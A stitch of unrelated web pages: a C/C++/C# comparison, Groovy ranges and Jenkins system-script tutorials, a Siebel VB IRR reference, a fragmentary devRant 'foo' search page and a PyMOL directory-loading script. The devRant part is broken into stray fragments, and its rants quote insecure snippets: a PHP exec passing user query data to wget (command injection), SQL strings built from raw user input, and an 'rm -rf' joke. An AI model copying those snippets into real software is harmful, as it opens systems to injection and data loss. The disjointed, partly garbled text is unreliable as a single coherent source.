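print(build_pattern("/tmp", "sdf"))
print(build_pattern("/tmp", "foo.woo.pdb"))
```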
http://pymolwiki.org/index.php/LoadDir
CC-MAIN-2015-14
refinedweb
310
79.46
No bots with no captcha in Django forms.

Project description

No bots with no captcha. An easy and fast way to secure your Django forms without using the damned, hated-by-everyone captcha.

INITIAL ACTIONS

Include nocaptcha in your settings' installed apps:

INSTALLED_APPS = (
    ...
    'nocaptcha',
    ...
)

TYPICAL USAGE

Include nocaptcha in your form. Add a secret password, which will be used in the md5 hash, and a min_time value: the shortest time in which your form could plausibly be filled.

from nocaptcha.forms import NoCaptchaForm

class ContactForm(NoCaptchaForm, forms.Form):
    secret_password = "NoCaptcha rocks!"
    min_time = 5

    name = forms.CharField(label="Name")
    message = forms.CharField(label="Message", widget=forms.Textarea)

BENEFITS

From now on, all the field names in your form will be encoded as md5(timestamp + fieldname + secret_password). The timestamp field will be created with the timestamp of the initial GET of the page. If the form is posted in less than min_time, an error will be raised.

A few honeypots with tempting names like "name" or "password", hidden with the "display: none" style, will also be added. If any of them is filled, an error will be raised. The honeypots are sampled from a list of honeypots and their order is shuffled.

With these changes, the chance that any bot will automatically pass through your form is minimised to zero. So stop using that damned, hated-by-everyone captcha. Use nocaptcha.

REQUIREMENTS

Django >= 1.1.1
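The field-name encoding and the min_time check described under BENEFITS can be sketched in a few lines of plain Python. These helpers are illustrative only and are not the package's actual internals; the hash recipe md5(timestamp + fieldname + secret_password) is taken from the text above.

```python
import hashlib
import time

def hashed_field_name(fieldname, secret_password, timestamp=None):
    # md5(timestamp + fieldname + secret_password), per the description.
    timestamp = timestamp if timestamp is not None else str(int(time.time()))
    digest_input = (timestamp + fieldname + secret_password).encode("utf-8")
    return hashlib.md5(digest_input).hexdigest()

def submitted_too_fast(posted_at, rendered_at, min_time=5):
    # The form came back faster than a human could plausibly fill it.
    return (posted_at - rendered_at) < min_time

name_field = hashed_field_name("name", "NoCaptcha rocks!", timestamp="1000")
print(name_field)
print(submitted_too_fast(posted_at=1003, rendered_at=1000))  # True
```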
https://pypi.org/project/nocaptcha/0.3/
21 July 2010 17:54 [Source: ICIS news]

TORONTO (ICIS news)--Vitol, in partnership with investment firm Helios, is in exclusive talks to acquire Shell's downstream businesses in 19 African countries, the independent energy trading firm said on Wednesday.

The deal would, if realised, include Shell's downstream businesses in

The targeted businesses, which employed a staff of 2,500, included 1,300 retail sites and 1.2m cubic metres of terminal storage, it said.

Not included were Shell's lubricants business in

In related news, Shell said this month it was continuing to look for buyers for refineries in
http://www.icis.com/Articles/2010/07/21/9378268/vitol-in-talks-to-buy-shells-downstream-businesses-in-africa.html
I am having an issue trying to create a New Model when using the Import Adaptive Web Service Model option.

1) I have been able to successfully create and deploy the adaptive RFC model for the same RFC.
2) The RFC is web-enabled and works.
3) In the wizard, for the WSDL source I am selecting "Local File System or Url".
4) In the wizard, for Logical Destinations I am selecting "No logical Destinations", because my other option that uses "Defaults" does not work and I do not see them configured in the JCo list. I'm not sure if this is right or not, but I can get back to this later.
5) For "choose a WSDL file": I created a WSDL file because my WSDL URL does not work, but the file does on this step.
6) A screen comes up with two grids, a list of namespaces in the top grid and entities in the bottom grid, but this error shows up at the top:

Invalid Entry! Only $,a-z,A-Z,0-9 are allowed ModelClassName Clash: GT_Final,GT_Final

I can change the model class name for the two "like" entries in the Entity list at the bottom, but this only removes one of the error messages and leaves me with "Invalid Entry! Only $,a-z,A-Z,0-9 are allowed". The Finish button stays disabled.

Can someone help me?

UPDATE: I get the same message when trying to consume the BAPI_FLIGHT_GETLIST web service.

Thank you,
Newbie NWDS Developer - James

Edited by: jpcosa on Feb 24, 2010 3:43 PM
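The wizard's complaint maps to a simple character whitelist: the underscore in "GT_Final" falls outside the allowed set, which would explain why renaming the clashing entries alone doesn't clear the second error. A hypothetical Python version of such a check (a guess at what NWDS validates, not its actual code):

```python
import re

ALLOWED = re.compile(r"^[$A-Za-z0-9]+$")

def valid_model_class_name(name):
    # Only $, a-z, A-Z, 0-9 are allowed, per the wizard's message.
    return bool(ALLOWED.match(name))

print(valid_model_class_name("GT_Final"))  # False: "_" is not allowed
print(valid_model_class_name("GTFinal"))   # True
```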
https://answers.sap.com/questions/7054774/import-adaptive-web-svc-model-issue---modelclassna.html
Answered by: Index a multiple value column in BCS external content type "SharePoint 2013"

Question

Regarding SharePoint 2013 Search, does anybody know how to index/crawl a multi-value column (in this column, values are separated with commas or written in XML)? In the index, I don't want the pure text value for this column but a structured text value. The reason is that we have a product database and a product can be related to several categories, so the category column holds multiple values and it is meaningless to crawl this column as a pure text value. In FAST ESP, I know we can create a custom index profile in which we can specify the way to crawl a specific property in XML format. Monday, December 24, 2012 2:30 AM

Answers

I found it. In SP 2013, this feature is replaced by "Custom content processing with the Content Enrichment web service callout". An implementation sample: , December 27, 2012 4:59 AM

All replies

I read this article and it says that in FAST Search 2010, to do this I can create a custom pipeline extensibility stage and have it separate the values by the \u2029 character. I tried replacing ; with \u2029 directly in the column value but it doesn't work. My question is: does SharePoint 2013 Search support creating custom pipeline extensibility? Tuesday, December 25, 2012 1:50 AM

I get the feeling that SharePoint 2013 Search doesn't even support this kind of situation. I just read some topics regarding crawling a multi-value property in FAST for SharePoint 2010. In FAST for SharePoint 2010, the crawled property has a Multi-Valued attribute. However, in the new version this attribute is even GONE... Tuesday, December 25, 2012 7:52 AM

I managed to get the content enrichment for multiple values property to work.
The multiple value managed property comes into the item.ItemProperties as List<string> and the original property value is in its [0]. To make it work, just split the values by ';', insert them into a new List<string> object and add it to the output processed item properties. Here is my sample code. You can also add a log feature to the web service for debugging purposes.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.Serialization;
using System.ServiceModel;
using System.ServiceModel.Web;
using System.Text;
using Microsoft.Office.Server.Search.ContentProcessingEnrichment;
using Microsoft.Office.Server.Search.ContentProcessingEnrichment.PropertyTypes;
using System.IO;

namespace ContentEnrichmentService
{
    public class ContentEnrichmentService : IContentProcessingEnrichmentService
    {
        public ProcessedItem ProcessItem(Item item)
        {
            ProcessedItem processedItem = new ProcessedItem
            {
                ItemProperties = new List<AbstractProperty>()
            };
            WriteLog("Start to process content enrichment...\n");
            processedItem.ItemProperties.Clear();
            try
            {
                var categoryProperty = item.ItemProperties.Where(p => p.Name == "BCSVendorCategory").FirstOrDefault();
                Property<List<string>> categoryProp = categoryProperty as Property<List<string>>;
                if (categoryProp != null && categoryProp.Value != null && categoryProp.Value.Count > 0)
                {
                    string[] propValues = categoryProp.Value.First().Split(';');
                    List<string> listpropValues = propValues.ToList();
                    // Drop empty entries left by trailing separators.
                    listpropValues.RemoveAll(v => v.Length == 0);

                    Property<List<string>> newCategoryProp = new Property<List<string>>();
                    newCategoryProp.Name = "VendorCategory";
                    newCategoryProp.Value = listpropValues;
                    processedItem.ItemProperties.Add(newCategoryProp);
                    WriteLog(string.Format("{0} values are added to property {1}.", newCategoryProp.Value.Count, newCategoryProp.Name));
                }
            }
            catch (Exception ex)
            {
                WriteLog(string.Format("Exception is encountered. Error Message: {0}", ex.Message + "\n\t" + ex.StackTrace));
            }
            return processedItem;
        }

        private void WriteLog(string msg)
        {
            using (var writer = new StreamWriter("C:\\Temp\\ContentEnrichmentWebServiceTraceLog_" + System.DateTime.Today.ToString("yyyyMMdd") + ".txt", true))
            {
                writer.Write(System.DateTime.Now.ToString("MM/dd/yyyy HH:mm:ss") + "\t" + msg);
                writer.WriteLine("");
            }
        }
    }
}

Saturday, December 29, 2012 2:20 AM - Proposed as answer by rk_muddala Saturday, February 8, 2014 10:50 AM

Thanks for the links! I implemented a variation of the sample. My crawl doesn't seem to kick off the web service at all. I don't get any errors or warnings. I removed the trigger to force the web service to be used but it doesn't seem to be working. Was there anything you had to do to get things to fire? I ran all the PowerShell commands and added the configuration. Thanks! -=Steve Tuesday, June 18, 2013 4:28 PM

1. Did you map the crawled property to a managed property and set it in the InputProperties (in the content enrichment configuration)?
2. Can you access this Content Enrichment web service in a browser?
3. If the Content Enrichment web service and the crawler server are on the same server, how is the memory usage when doing a full crawl? If memory is not sufficient, the app pool of this content enrichment web service will go down as well.
4. Do you have more than one Search Service Application created in the SP farm? If yes, remove the other search service application and try it again.

These are the problems I experienced in the past couple of months. Also, I suggest you implement a simple txt log feature in your content enrichment web service to check the process. Tuesday, June 18, 2013 4:39 PM

Thanks. I do have event log code to trace but nothing is in there. I only have 1 SSA and I can access the web service from the browser. I created a Managed Property to be the one that is multi-value (and is returned from the web service) but it is not mapped to a crawled property.
Do I need to map that to something? -=Steve Tuesday, June 18, 2013 5:14 PM

No, you don't need to map the output property to any crawled property. Maybe you can try restarting the Osearch service and the Search Controller service, or delete and recreate the SSA. BTW, can you paste your content enrichment PowerShell configuration? Tuesday, June 18, 2013 6:00 PM

$ssa = Get-SPEnterpriseSearchServiceApplication
$config = New-SPEnterpriseSearchContentEnrichmentConfiguration
$config.DebugMode = $false
$config.Endpoint = ""
$config.FailureMode = "ERROR"
$config.InputProperties = "EventDepartments"
$config.OutputProperties = "EventDeptMulti"
$config.SendRawData = $false
Set-SPEnterpriseSearchContentEnrichmentConfiguration –SearchApplication $ssa –ContentEnrichmentConfiguration $config

EventDepartments contains string values like -> "HR;IT;Marketing;Finance" Tuesday, June 18, 2013 6:14 PM

It looks like an authentication problem. I guess that is your SharePoint root site collection and it requires auth. Try moving the content enrichment web service out to some other anonymous IIS website. This web service can be hosted anywhere as long as the search service can reach it. Tuesday, June 18, 2013 6:22 PM

Thanks. I restarted my search servers and now I am getting some (error) feedback from the crawl. I need to dig in. -=Steve Tuesday, June 18, 2013 6:53 PM

Ok. I fixed my crawl and it is trying to call the enrichment web service. I am getting errors that the item cannot be sent to the content enrichment service. I moved the web service to a non-SharePoint address and received the same error. The ULS logs show attempts to call but no errors. I can't navigate to the service with the ProcessItem call. What do you get when you navigate to that? I am probably going to put this aside for now and focus on moving forward with other items.
-=SteveWednesday, June 19, 2013 4:36 PM Paste out your enrichmentservice.svc.cs code to see if there is anything wrong in your code.Wednesday, June 19, 2013 5:56 PM I turned on Verbose logging and found that there is an authentication issue: The HTTP request is unauthorized with client authentication scheme 'Anonymous'. The authentication header received from the server was 'Negotiate,NTLM'. I had Anonymous and Windows Authentication Enabled on the web service web site. When I turn Anonymous off, I get the following when attempting to browse the service:. My web.config probably "ain't right". I am trying to add the bindings and such as explained on other sites. I can't add an endpoint as per the example, they remove the IService.cs, and therefore I don't have a Contract on the service. What does your web.config look like? What settings in IIS are correct? Thanks! -=SteveWednesday, June 26, 2013 7:20 PM I dorked around some more and got it to work. I re-enabled Anonymouse and used this as my bindings: <bindings> <basicHttpBinding> <binding name="httpBinding"> <security mode="TransportCredentialOnly"> <transport clientCredentialType="None" /> </security> </binding> </basicHttpBinding> </bindings> Now I just need to put the real code back into the service!Wednesday, June 26, 2013 7:57 PM - <system.serviceModel> <behaviors> <serviceBehaviors> <behavior> <!--="true"/> </behavior> </serviceBehaviors> </behaviors> <protocolMapping> <add binding="basicHttpsBinding" scheme="https" /> </protocolMapping> <serviceHostingEnvironment aspNetCompatibilityEnabled="true" multipleSiteBindingsEnabled="true" /> > </system.serviceModel>Thursday, June 27, 2013 1:47 AM Any chance someone the enrichment service it to work on a farm with multiple SSA's + multiple servers? It does work on my Dev environment (one SSA, one server, service is locally). 
It is registered:

Endpoint :
Timeout : 9999
FailureMode : Error
InputProperties : {AgileProject}
OutputProperties : {AgileProject}
Trigger :
DebugMode : False
SendRawData : False
MaxRawDataSize : 100000

But it doesn't work, and it doesn't write ULS logs either. So I'm clueless. The service app pool is the same one that runs the search. Anonymous access is set; I tried everything there is in the post regarding the web.config. Any ideas? Tuesday, May 13, 2014 3:21 PM

It works in my multiple-server environment. For multiple SSAs, I am not sure if it works or not; I have never run into that situation. Anyway, you may delete the SSAs and have only one SSA in the farm to narrow it down. Wednesday, May 14, 2014 1:26 AM

Thanks. Deleting the second SSA did solve it. The thing is that there are multiple SSAs on the production environment, so at this moment the enrichment service won't be happening, unless there is a solution for multiple SSAs, or someone comes up with another way to modify the refinement at runtime... Thanks. Thursday, May 15, 2014 10:53 AM
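The essential transformation in the accepted answer, turning one "HR;IT;Marketing;Finance" string into a list of separate values while dropping empties, is language-independent; here is the same idea sketched in Python rather than the thread's C#:

```python
def split_multivalue(raw, sep=";"):
    # "HR;IT;Marketing;Finance" -> ["HR", "IT", "Marketing", "Finance"],
    # discarding empty entries left by trailing or doubled separators.
    return [value for value in raw.split(sep) if value]

print(split_multivalue("HR;IT;Marketing;Finance"))
print(split_multivalue("HR;;Finance;"))
```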
https://social.msdn.microsoft.com/Forums/windowsapps/en-US/7fa6fe7b-8ea5-42eb-b9d6-fa396da3eff9/index-a-multiple-value-column-in-bcs-external-content-type-quotsharepoint-2013quot?forum=sharepointsearch
Recently, I was tricked by Json.NET. Consider these two classes:

public class A
{
    public string Name { get; }

    [JsonConstructor]
    public A(string name)
    {
        Name = name;
    }
}

public class B
{
    public A Test { get; set; } = new A("Default");
}

Now let's serialize an instance of B in the following way:

var serializedText = JsonConvert.SerializeObject(new B() { Test = new A("Fun") { } });

In the result, as expected, we will get the following text:

{"Test":{"Name":"Fun"}}

Now let's deserialize this string:

var result = (B)JsonConvert.DeserializeObject(serializedText, typeof(B));

Now, a question for 1 million dollars: what will be the value of result.Test.Name in the deserialized object? If you say Fun, you are wrong! It will be Default! I was surprised and I spent some time investigating this issue. Why did it happen? Well, it seems that when Json.NET creates a new object during deserialization and notices that some property of this object is not null, then that default value will not be overridden. If it's a problem, there are at least 2 solutions:

- Remove the default value for this property. It doesn't matter if it is set in a constructor or via a property initializer.
- Add a special constructor. For instance, for class B it'll look as below. This constructor instructs Json.NET that the Test property must be set even if a default value exists.

public class B
{
    public A Test { get; set; } = new A("Default");

    public B() {}

    [JsonConstructor]
    public B(A test)
    {
        Test = test;
    }
}

*The picture at the beginning of the post comes from my own resources and shows elephants from Warsaw zoo.

6 comments:

Isn't the problem much simpler than property construction? A.Name is written as read-only. Whether the deserializer creates an instance of A to assign to B.Test or uses an existing instance (your "Default") is irrelevant. B.Test.Name is still read-only.

Thanks for the comment. Next time I will use more descriptive names for classes ;) As to "making the properties read/write": it should help to make A.Name writable. However, it is not always possible.
I've run into an issue with default values and Preserve References, see

Upon deserialization you should use:

var result = JsonConvert.DeserializeObject<B>(serializedText, new JsonSerializerSettings { ObjectCreationHandling = ObjectCreationHandling.Replace });

@Tyler Brinkley - Thanks, I didn't know this one.
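To make the mechanism concrete, here is a small Python imitation of populate-style deserialization that skips members which already hold a non-null default. This mimics the observed behaviour only, not Json.NET's actual implementation:

```python
class A:
    def __init__(self, name):
        self.name = name

class B:
    def __init__(self):
        # Property-initializer analogue: a non-null default.
        self.test = A("Default")

def deserialize_into(obj, data):
    # Populate-style deserialization: members that already hold a
    # non-None value are reused instead of being overwritten.
    for key, value in data.items():
        if getattr(obj, key, None) is not None:
            continue  # keep the existing default, as Json.NET did here
        setattr(obj, key, A(**value))
    return obj

b = deserialize_into(B(), {"test": {"name": "Fun"}})
print(b.test.name)  # prints "Default", not "Fun"
```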
https://www.michalkomorowski.com/2017/08/jsonnet-also-tricked-me.html
Announcing the .NET Framework 4.8 We are thrilled to announce the release of the .NET Framework 4.8 today. It’s included in the Windows 10 May 2019 Update. .NET Framework 4.8 is also available on Windows 7+ and Windows Server 2008 R2+. You can install .NET 4.8 from our .NET Download site. For building applications targeting .NET Framework 4.8, you can download the NET 4.8 Developer Pack. If you just want the .NET 4.8 runtime, you can try: - .NET 4.8 Web Installer – requires an internet connection during installation - .NET 4.8 Offline installer – can be downloaded and installed later in a disconnected state. Supported Windows Versions Windows Client versions: Windows 10 version 1903, Windows 10 version 1809, Windows 10 version 1803, Windows 10 version 1709, Windows 10 version 1703, Windows 10 version 1607, Windows 8.1, Windows 7 SP1 Windows Server versions: Windows Server 2019, Windows Server version 1803, Windows Server 2016, Windows Server 2012, Windows Server 2012 R2, Windows Server 2008 R2 SP1 New Features in .NET Framework 4.8 Runtime – JIT improvements The JIT in .NET 4.8 is based on .NET Core 2.1. All bug fixes and many code generation-based performance optimizations from .NET Core 2.1 are now available in the .NET Framework. Runtime – NGEN improvements NGEN images in the .NET Framework no longer contain writable & executable sections. This reduces the surface area available to attacks that attempt to execute arbitrary code by modifying memory that will be executed. While there will still be writable & executable data in memory at runtime, this change removes those mapped from NGEN images, allowing them to run in restricted environments that don’t permit executable/writable sections in images. Runtime – Antimalware Scanning for All Assemblies In previous versions of .NET Framework, Windows Defender or third-party antimalware software would automatically scan all assemblies loaded from disk for malware. 
However, assemblies loaded from elsewhere, such as by using Assembly.Load(byte[]), would not be scanned and could potentially carry viruses undetected. .NET Framework 4.8 on Windows 10 triggers scans for those assemblies by Windows Defender and many other antimalware solutions that implement the Antimalware Scan Interface. We expect that this will make it harder for malware to disguise itself in .NET programs. BCL – Updated ZLib Starting with .NET Framework 4.5 we used the native version of ZLib (a native external compression library used for data compression) from in clrcompression.dll in order to provide an implementation for the deflate algorithm. In .NET Framework 4.8 we updated clrcompression.dll to use version 1.2.11 which includes several key improvements and fixes. BCL – Reducing FIPS Impact on Cryptography .NET Framework 2.0+ have cryptographic provider classes such as SHA256Managed, which throw a CryptographicException when the system cryptographic libraries are configured in “FIPS mode”. These exceptions are thrown because the managed versions have not undergone FIPS (Federal Information Processing Standards) 140-2 certification (JIT and NGEN image generation would both invalidate the certificate), unlike the system cryptographic libraries. Few developers have their development machines in “FIPS mode”, which results in these exceptions being raised in production (or on customer systems). The “FIPS mode” setting was also used by .NET Framework to block cryptographic algorithms which were not considered an approved algorithm by the FIPS rules. For applications built for .NET Framework 4.8, these exceptions will no longer be thrown (by default). Instead, the SHA256Managed class (and the other managed cryptography classes) will redirect the cryptographic operations to a system cryptography library. 
This policy change effectively removes a potentially confusing difference between developer environments and the production environments in which the code runs and makes native components and managed components operate under the same cryptographic policy. Applications targeting .NET Framework 4.8 will automatically switch to the newer, relaxed policy and will no longer see exceptions being thrown from MD5Cng, MD5CryptoServiceProvider, RC2CryptoServiceProvider, RIPEMD160Managed, and RijndaelManaged when in “FIPS mode”. Applications which depend on the exceptions from previous versions can return to the previous behavior by setting the AppContext switch “Switch.System.Security.Cryptography.UseLegacyFipsThrow” to “true”. Windows Forms – Accessibility Enhancements In .NET Framework 4.8 WinForms is adding three new features to enable developers to write more accessible applications. The features added are intended to make communication of application data to visually impaired users more robust. We’ve added support for ToolTips when a user navigates via the keyboard, we’ve added LiveRegions and Notification Events to many commonly used controls. To enable these features your application needs to have the following AppContextSwitches enabled in the App.config file: Windows Forms – UIA LiveRegions Support in Labels and StatusStrips UIA Live Regions allow application developers to notify screen readers of a text change on a control that is located apart from the location where the user is working. Examples of where this would come in handy could be a StatusStrip that shows a connection status. If the connection is dropped and the Status changes, the developer might want to notify the screen reader of this change. Windows Forms has implemented UIA LiveRegions for both the Label control and the StatusStrip control. Example use of the LiveRegion in a Label Control: Narrator will now announce “Ready” Regardless of where the user is interacting with the application. 
You can also implement your UserControl as a Live region: Windows Forms – UIA Notification Events In Windows 10 Fall Creators Update Windows introduced a new method of having an application notify Narrator that content has changed, and Narrator should announce the change. The UIA Notification event provides a way for your app to raise a UIA event which leads to Narrator simply making an announcement based on text you supply with the event, without the need to have a corresponding control in the UI. In some scenarios, this could be a straightforward way to dramatically improve the accessibility of your app. For more information about UIA Notification Events, see this blog post. An example of where a Notification might come in handy is to notify the progress of some process that may take some time. An example of raising the Notification event: Windows Forms – ToolTips on keyboard access Currently a control tooltip can only be triggered to pop up by moving a mouse pointer into the control. This new feature enables a keyboard user to trigger a control’s tooltip by focusing the control using a Tab key or arrow keys with or without modifier keys. This particular accessibility enhancement requires an additional AppContextSwitch as seen in the following example: - Create a new WinForms application - Add the following XML to the App.config file - Add several buttons and a ToolTip control to the application’s form. - Set tooltips for the buttons. - Run the application and navigate between the buttons using a keyboard: Windows Forms – DataGridView control accessible hierarchy changes Currently the accessible hierarchy (UI Automation tree) shows the editing box tree element as a child of currently edited cell but not as a root child element of DataGridView. 
The hierarchy tree update can be observed using Inspect tool: WCF – ServiceHealthBehavior Health endpoints have many benefits and are widely used by orchestration tools to manage the service based on the service health status. Health checks can also be used by monitoring tools to track and alert on the availability and performance of the service, where they serve as early problem indicators. ServiceHealthBehavior is a WCF service behavior that extends IServiceBehavior. When added to the ServiceDescription.Behaviors collection, it will enable the following: - Return service health status with HTTP response codes: One can specify in the query string the HTTP status code for a HTTP/GET health probe request. - Publication of service health: Service specific details including service state and throttle counts and capacity are displayed using an HTTP/GET request using the “?health” query string. Knowing and easily having access to the information displayed is important when trouble-shooting a mis-behaving WCF service. Config ServiceHealthBehavior: There are two ways to expose the health endpoint and publish WCF service health information: by using code or by using a configuration file. - Enable health endpoint using code - Enable health endpoint using config Return service health status with HTTP response codes: Health status can be queried by query parameters (OnServiceFailure, OnDispatcherFailure, OnListenerFailure, OnThrottlePercentExceeded). HTTP response code (200 – 599) can be specified for each query parameter. If the HTTP response code is omitted for a query parameter, a 503 HTTP response code is used by default. Query parameters and examples: - OnServiceFailure: - Example: by querying, a 450 HTTP response status code is returned when ServiceHost.State is greater than CommunicationState.Opened. 
- OnDispatcherFailure: - Example: by querying, a 455 HTTP response status code is returned when the state of any of the channel dispatchers is greater than CommunicationState.Opened. - OnListenerFailure: - Example: by querying, a 465 HTTP response status code is returned when the state of any of the channel listeners is greater than CommunicationState.Opened. - OnThrottlePercentExceeded: Specifies the percentage {1 – 100} that triggers the response and its HTTP response code {200 – 599}. - Example: by querying 70:350,95:500, when the throttle percentage is equal or larger than 95%, 500 the HTTP response code is returned; when the percentage is equal or larger than 70% and less then 95%, 350 is returned; otherwise, 200 is returned. Publication of service health: After enabling the health endpoint, the service health status can be displayed either in html (by specifying the query string:) or xml (by specifying the query string:) formats. returns empty html page. Note: It’s best practice to always limit access to the service health endpoint. You can restrict access by using the following mechanisms: - Use a different port for the health endpoint than what’s used for the other services as well as use a firewall rule to control access. - Add the desirable authentication and authorization to the health endpoint binding. WPF – Screen narrators no longer announce elements with Collapsed or Hidden visibility Elements with Collapsed or Hidden visibility are no longer announced by the screen readers. User interfaces containing elements with a Visibility of Collapsed or Hidden can be misrepresented by screen readers if such elements are announced to the user. In .NET Framework 4.8, WPF no longer includes Collapsed or Hidden elements in the Control View of the UIAutomation tree, so that the screen readers can no longer announce these elements. 
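Returning to the ServiceHealthBehavior section above: the OnThrottlePercentExceeded value encodes percentage:code pairs such as 70:350,95:500, and the highest threshold that the current throttle percentage meets or exceeds wins. A sketch of that selection logic (the parsing details are inferred from the examples given, not taken from WCF itself):

```python
def pick_status(throttle_percent, spec="70:350,95:500", default=200):
    # Parse "percent:code" pairs and return the code attached to the
    # highest threshold that throttle_percent meets or exceeds.
    pairs = sorted(
        (int(p), int(c))
        for p, c in (item.split(":") for item in spec.split(","))
    )
    status = default
    for threshold, code in pairs:
        if throttle_percent >= threshold:
            status = code
    return status

print(pick_status(96))  # 500
print(pick_status(80))  # 350
print(pick_status(10))  # 200
```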
WPF – SelectionTextBrush Property for use with Non-Adorner Based Text Selection In the .NET Framework 4.7.2 WPF added the ability to draw TextBox and PasswordBox text selection without using the adorner layer (See Here). The foreground color of the selected text in this scenario was dictated by SystemColors.HighlightTextBrush. In the .NET Framework 4.8 we are adding a new property, SelectionTextBrush, that allows developers to select the specific brush for the selected text when using non-adorner based text selection. This property works only on TextBoxBase derived controls and PasswordBox in WPF applications with non-adorner based text selection enabled. It does not work on RichTextBox. If non-adorner based text selection is not enabled, this property is ignored. To use this property, simply add it to your XAML code and use the appropriate brush or binding. The resulting text selection will look like this: You can combine the use of SelectionBrush and SelectionTextBrush to generate any color combination of background and foreground that you deem appropriate. WPF – High DPI Enhancements WPF has added support for Per-Monitor V2 DPI Awareness and Mixed-Mode DPI scaling in .NET 4.8. Additional information about these Windows concepts is available here. The latest Developer Guide for Per monitor application development in WPF states that only pure-WPF applications are expected to work seamlessly in a high-DPI WPF application and that Hosted HWND’s and Windows Forms controls are not fully supported. .NET 4.8 improves support for hosted HWND’s and Windows Forms interoperation in High-DPI WPF applications on platforms that support Mixed-Mode DPI scaling (Windows 10 v1803). 
When hosted HWND’s or Windows Forms controls are created as Mixed-Mode DPI scaled windows, (as described in the “Mixed-Mode DPI Scaling and DPI-aware APIs” documentation by calling SetThreadDpiHostingBehavior and SetThreadDpiAwarenessContext API’s), it will be possible to host such content in a Per-Monitor V2 WPF application and have them be sized and scaled appropriately. Such hosted content will not be rendered at the native DPI – instead, the OS will scale the hosted content to the appropriate size. The support for Per-Monitor v2 DPI awareness mode also allows WPF controls to be hosted (i.e., parented) under a native window in a high-DPI application. Per-Monitor V2 DPI Awareness support will be available on Windows 10 v1607 (Anniversary Update). Windows adds support for child-HWND’s to receive DPI change notifications when Per-Monitor V2 DPI Awareness mode is enabled via the application manifest. This support is leveraged by WPF to ensure that controls that are hosted under a native window can respond to DPI changes and update themselves. For e.g.- a WPF control hosted in a Windows Forms or a Win32 application that is manifested as Per Monitor V2 – will now be able to respond correctly to DPI changes and update itself. Note that Windows supports Mixed-Mode DPI scaling on Windows 10 v1803, whereas Per-Monitor V2 is supported on v1607 onwards. To try out these features, the following application manifest and AppContext flags must be enabled: - Enable Per-Monitor DPI in your application - Turn on Per-Monitor V2 in your app.manifest - Turn on High DPI support in WPF - Target .NET Framework 4.6.2 or greater and 3. Set AppContext switch in your app.config Alternatively, Set AppContextSwitch Switch.System.Windows.DoNotUsePresentationDpiCapabilityTier2OrGreater=false in App.Config to enable Per-Monitor V2 and Mixed-Mode DPI support introduced in .NET 4.8. The runtime section in the final App.Config might look like this: AppContext switches can also be set in registry. 
You can refer to the AppContext Class for additional documentation. WPF – Support for UIAutomation ControllerFor property UIAutomation’s ControllerFor property returns an array of automation elements that are manipulated by the automation element that supports this property. This property is commonly used for Auto-suggest accessibility. ControllerFor is used when an automation element affects one or more segments of the application UI or the desktop. Otherwise, it is hard to associate the impact of the control operation with UI elements. This feature adds the ability for controls to provide a value for ControllerFor property. A new virtual method has been added to AutomationPeer: To provide a value for the ControllerFor property, simply override this method and return a list of AutomationPeers for the controls being manipulated by this AutomationPeer: WPF – Tooltips on keyboard access Currently tooltips only display when a user hovers the mouse cursor over a control. In .NET Framework 4.8, WPF is adding a feature that enables tooltips to show on keyboard focus, as well as via a keyboard shortcut. To enable this feature, an application needs to target .NET Framework 4.8 or opt-in via AppContext switch “Switch.UseLegacyAccessibilityFeatures.3” and “Switch.UseLegacyToolTipDisplay”. Sample App.config file: Once enabled, all controls containing a tooltip will start to display it once the control receives keyboard focus. The tooltip can be dismissed over time or when keyboard focus changes. Users can also dismiss the tooltip manually via a new keyboard shortcut Ctrl + Shift + F10. Once the tooltip has been dismissed it can be displayed again via the same keyboard shortcut. Note: RibbonToolTips on Ribbon controls won’t show on keyboard focus – they will only show via the keyboard shortcut. 
WPF – Added Support for SizeOfSet and PositionInSet UIAutomation properties

Windows 10 introduced the new UIAutomation properties SizeOfSet and PositionInSet, which are used by applications to describe the count of items in a set. UIAutomation client applications such as screen readers can then query an application for these properties and announce an accurate representation of the application's UI. This feature adds support for WPF applications to expose these two properties to UIAutomation. This can be accomplished in two ways:

1. DependencyProperties: new DependencyProperties SizeOfSet and PositionInSet have been added to the System.Windows.Automation.AutomationProperties namespace. A developer can set their values via XAML.
2. AutomationPeer virtual methods: virtual methods GetSizeOfSetCore and GetPositionInSetCore have also been added to the AutomationPeer class. A developer can provide values for SizeOfSet and PositionInSet by overriding these methods.

Automatic values

Items in ItemsControls will provide a value for these properties automatically, without additional action from the developer. If an ItemsControl is grouped, the collection of groups will be represented as a set and each group counted as a separate set, with each item inside that group providing its position inside that group as well as the size of the group. Automatic values are not affected by virtualization. Even if an item is not realized, it is still counted towards the total size of the set and affects the position in the set of its sibling items. Automatic values are only provided if the developer is targeting .NET Framework 4.8 or has set the AppContext switch "Switch.UseLegacyAccessibilityFeatures.3", for example via the App.config file.

Closing

Please try out these improvements in the .NET Framework 4.8 and share your feedback in the comments below or via GitHub. Thank you!

In your API changes document, you have added a new Tls13 enum value.
Any more information about that, and what Windows versions will support TLS 1.3?

TLS 1.3 support was added to .NET Framework 4.8 in a way that it will light up when it is available in the OS. Please check Windows announcements and plans for when that is going to happen. We do not have deeper insights into the TLS 1.3 schedule in the Windows OS.

Hello Ziki, back with TLS 1.2, it was announced that using .NET 4.6 as the target framework, we get automatic support for the correct cipher suite etc. as supported/configured by the OS.
* Will this extend to TLS 1.3 without updating the .NET Framework?
* Will I have to install .NET 4.8 on the client to get automatic support while still running with a target framework of .NET 4.6?
* Will I be required to set the target framework 4.8 (or some compatibility switch) to get TLS 1.3?

<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2"/></startup>

Many thanks and best regards, Michael

Hello Michael, sorry for the late answer, I missed your reply 🙁 Yes, the same TLS 1.2 promise should be extended to TLS 1.3 as soon as the OS supports it and if your application leaves the recommended OS defaults as per our guidance. I am not 100% sure if .NET Framework 4.8 will have to be installed (I think that it is not a must-have, but only about 70% sure). Your app will NOT have to target 4.8 for sure. I would suggest testing it out once TLS 1.3 is supported by the OS.

It appears the link for the Developer Guide for per-monitor application development in WPF is broken, under the WPF high DPI section.

Thank you for reporting it! The link is fixed now.

"Note that Windows supports Mixed-Mode DPI scaling on Windows 10 v1803, whereas Per-Monitor V2 is supported on v1607 onwards."

Per-Monitor V2 was added in 1703 (Creators Update), which is correctly written in the manifest comments and in the High DPI link that is included.
`The JIT in .NET 4.8 is based on .NET Core 2.1` – does it mean that Tiered Compilation also comes to .NET 4.8 from Core 2.1?

Tiered compilation is not supported with .NET Framework 4.8, and there are no plans to enable it. You can also see that we're still working (after multiple versions) on designing its final configuration. It isn't a good candidate for .NET Framework.

